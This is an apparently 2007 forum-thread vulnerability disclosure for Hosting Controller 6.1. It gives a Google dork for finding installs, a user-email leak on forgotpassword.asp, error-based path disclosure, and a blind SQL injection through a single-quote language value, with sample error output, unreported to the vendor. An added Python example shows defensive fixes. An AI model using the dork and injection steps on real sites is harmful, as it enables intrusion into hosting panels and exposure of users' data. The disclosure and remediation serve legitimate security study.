Hosting Controller 6.1, hotfix 3.3 - Bad Input validation

Software: Hosting Controller 6.1, latest hot fix 3.3
URL: http://www.hostingcontroller.com
Google hack keywords: "Powered by hosting controller inurl:/admin"
Severity: Medium
Found by Z0rr0 (don't know if anyone else already found them) - July 15, 2007

1. Information leak at "forgotpassword.asp" page to disclose users' email.
URL: http://domain.com/admin/forgotpassword.asp
Exploit: Enter a known user account, such as "hcadmin"; this will show you the exact email of user "hcadmin".
Code:
Your Password Authentication ID has been e-mailed to you at email@emai.com
2. Bad input validation at "forgotpassword.asp" causes information leakage.
URL: http://domain.com/admin/forgotpassword.asp
Exploit: Inject a single quote into the Login ID field of the "forgotpassword" page. It causes an '800a000d' error with the path disclosed.
Code:
.......... <font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: 'GetErrDesc'</font>
<p>
<font face="Arial" size=2>/admin/common/SqlInject.asp</font><font face="Arial" size=2>, line 21</font>
3. Bad input validation at the "relogin.asp" Language field causes SQL injection.
URL: http://domain.com/admin/common/relogin.asp
Exploit: Relogin form as below:
Code:
<form action="http://domain.com/admin/common/relogin.asp?action=1" method="GET" id="loginfrm" name="loginfrm">
............
<td class="contents" width="110" height="22" align="right">Username :   </td>
<td class="contents" width="227" height="22"><input id="AdName" name="AdName" size="20" class="txtbox"></td>
..............
<td class="contents" width="110" height="22" align="right">Password :   </td>
<td class="contents" width="227" height="22"><input type="password" id="pass1" name="pass1" size="20" class="txtbox"></td>
.................
<td class="contents" width="110" height="22" align="right">Language :   </td>
<td class="contents" height="22">
<select name="language" class="combo" ID="Select1"><option selected VALUE="1'">English</option>
<option VALUE="2">.....</option>
................
</form>
Change the Value="1" to Value="1'" (add a single quote). This causes a Blind SQL injection "500 Internal Server Error":
Code:
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'languageID = 1''
Vendor not yet informed. (Z0rr0)
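The three findings above are all fixed by the same defensive pattern: never echo lookup results or engine errors to the client, and never splice request parameters into a query string. The following is an added example written for this page in Python with sqlite3 so it runs offline; it is not Hosting Controller code and the table names, column names, the "LoginID" parameter name and the sample accounts are all constructed for the demo. It shows the forgot-password page returning one fixed message whether or not the login exists (finding 1), a single quote in the Login ID producing no error at all (finding 2), and the language field being validated as a plain integer and bound as a parameter, so "1'" is rejected with a generic 400 instead of leaking an ODBC syntax error (finding 3).

```python
"""Added example (not Hosting Controller code): hardened handling of the
three inputs the advisory above abuses. sqlite3 stands in for the Access
back end; table/column names and sample rows are constructed for this demo."""
import sqlite3

# Constructed sample data standing in for the admin user table and the language table.
SAMPLE_USERS = [("hcadmin", "admin@example.invalid"), ("alice", "alice@example.invalid")]
SAMPLE_LANGUAGES = [(1, "English"), (2, "French")]

# The only message the forgot-password page ever returns, whether or not the
# login id exists: it neither confirms the account nor echoes the address.
GENERIC_RESET_MESSAGE = ("If that login id exists, password reset instructions "
                         "have been sent to the e-mail address on file.")


def build_db():
    """In-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT PRIMARY KEY, email TEXT NOT NULL)")
    conn.execute("CREATE TABLE languages (languageID INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO languages VALUES (?, ?)", SAMPLE_LANGUAGES)
    return conn


def forgot_password(conn, login_id):
    """Return (page_message, recipient_or_None).

    The recipient is handed to the mailer only; the page text is constant, so
    an attacker learns neither whether the login exists nor its address.
    The login id is bound as a parameter, so a quote is just data."""
    row = conn.execute("SELECT email FROM users WHERE login = ?", (login_id,)).fetchone()
    recipient = row[0] if row else None
    return GENERIC_RESET_MESSAGE, recipient


def parse_language_id(raw):
    """Accept only a short ASCII decimal integer; "1'" never reaches SQL."""
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 6):
        raise ValueError("invalid language id")
    return int(raw)


def relogin_language(conn, raw_language):
    """Resolve the language name. Returns ("ok", name) or ("bad_request", None)."""
    try:
        language_id = parse_language_id(raw_language)
    except ValueError:
        return ("bad_request", None)
    # Parameterised lookup: the integer is bound, not concatenated into the query.
    row = conn.execute("SELECT name FROM languages WHERE languageID = ?", (language_id,)).fetchone()
    if row is None:
        return ("bad_request", None)
    return ("ok", row[0])


def handle_request(conn, page, params):
    """Minimal dispatcher. Any unexpected exception becomes a generic 500 body;
    no script path, driver name or line number is ever sent to the client."""
    try:
        if page == "forgotpassword":
            message, _recipient = forgot_password(conn, params.get("LoginID", ""))
            return {"status": 200, "body": message}
        if page == "relogin":
            status, name = relogin_language(conn, params.get("language", ""))
            if status != "ok":
                return {"status": 400, "body": "Invalid request."}
            return {"status": 200, "body": "Language: " + name}
        return {"status": 404, "body": "Not found."}
    except Exception:  # noqa: BLE001 - deliberately broad: hide internals from the client
        return {"status": 500, "body": "An internal error occurred."}


if __name__ == "__main__":
    db = build_db()
    print(handle_request(db, "forgotpassword", {"LoginID": "hcadmin"}))  # constant message
    print(handle_request(db, "forgotpassword", {"LoginID": "'"}))        # same constant message
    print(handle_request(db, "relogin", {"language": "1'"}))             # 400, no ODBC error text
    print(handle_request(db, "relogin", {"language": "1"}))              # 200, Language: English
```

The key design choice is that the user-facing string in `forgot_password` is a constant: the address is returned to the caller solely so the mailer can use it, and the dispatcher discards it. Validating the language id as an integer before the query is a belt-and-braces measure on top of the parameter binding, and it also gives a clean 400 for values that are well-formed but unknown.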
Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation

doqkhanh wrote:
What I am interested in is finding out where the big names like Z0rr0 get their sources. When I search "Exploit: Relogin form as below:" on Google nothing comes up --> so it must be in some forum or some place that requires a login and does not let search bots in??? Could you give me a few words of guidance?
"Source"? If you want to find bugs like these, the best way is to install the software locally and study it.
Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation

Z0rr0 wrote:
If you want to find bugs like these, the best way is to install the software locally and study it.
I understand your approach now. Sorry for derailing the topic.